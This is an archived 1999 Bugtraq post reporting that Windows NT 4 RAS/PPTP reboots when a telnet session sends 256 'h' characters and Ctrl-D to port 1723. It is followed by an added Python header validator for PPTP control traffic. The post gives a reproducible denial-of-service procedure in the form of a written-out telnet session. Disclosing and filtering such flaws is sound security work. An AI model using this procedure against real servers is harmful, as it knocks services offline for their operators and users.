Bugtraq mailing list archives

RE Possible DOS in WinNT RAS (PPTP)


From: simon () CONCEPTS CO NZ (Simon Helson)
Date: Tue, 27 Apr 1999 20:55:50 -0700


Hello again.

Please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.

Unfortunately I don't have unlimited access to an NT server to play with.
However, I have tried this again (on the same server) this time over the
internet as opposed to a LAN. (trying to remove the NIC from the equation.)

Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.

The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net

The procedure I followed:

[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.

The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.

I hope this clears up the picture.

Cheers

Simon
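
Added example (not part of the post above and not code from any PPTP implementation): a Python check that a filter or sensor in front of TCP port 1723 could apply to the first bytes of a control connection, showing that the input typed in the session above does not pass PPTP header validation. It assumes the control-message header layout later published in RFC 2637; the function name and sample byte strings are constructed for illustration, and the post does not state what in the server mishandles the input.

```python
import struct

# PPTP control-message header as laid out in RFC 2637 (network byte order):
# length, PPTP message type, magic cookie, control message type, reserved0
PPTP_HDR = struct.Struct("!HHIHH")
PPTP_MAGIC = 0x1A2B3C4D
PPTP_CONTROL_MESSAGE = 1
START_CTRL_CONN_REQUEST = 1
START_CTRL_CONN_REQUEST_LEN = 156


def check_first_message(stream: bytes) -> str:
    """Classify the first bytes a client sent on a PPTP control connection.

    Hypothetical helper: returns "accept", "incomplete" (keep buffering,
    subject to a timeout) or "reject: <reason>" (drop the connection).
    """
    if len(stream) < PPTP_HDR.size:
        return "incomplete"
    length, msg_type, cookie, ctrl_type, reserved0 = PPTP_HDR.unpack_from(stream)
    # The cookie is checked first: arbitrary input almost never matches it.
    if cookie != PPTP_MAGIC:
        return "reject: bad magic cookie"
    if msg_type != PPTP_CONTROL_MESSAGE:
        return "reject: not a control message"
    if ctrl_type != START_CTRL_CONN_REQUEST:
        return "reject: first message is not Start-Control-Connection-Request"
    if length != START_CTRL_CONN_REQUEST_LEN or reserved0 != 0:
        return "reject: bad length or reserved field"
    if len(stream) < length:
        return "incomplete"
    return "accept"


# Constructed sample: 256 'h' bytes, like the input typed in the session above.
TYPED_INPUT = b"h" * 256

# Constructed sample: a well-formed header followed by a zeroed 144-byte body
# (only the header is validated here, so the body fields are left empty).
VALID_REQUEST = PPTP_HDR.pack(
    START_CTRL_CONN_REQUEST_LEN, PPTP_CONTROL_MESSAGE, PPTP_MAGIC,
    START_CTRL_CONN_REQUEST, 0,
) + bytes(START_CTRL_CONN_REQUEST_LEN - PPTP_HDR.size)

if __name__ == "__main__":
    for name, data in (("typed input", TYPED_INPUT), ("valid request", VALID_REQUEST)):
        print(f"{name}: {check_first_message(data)}")
```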


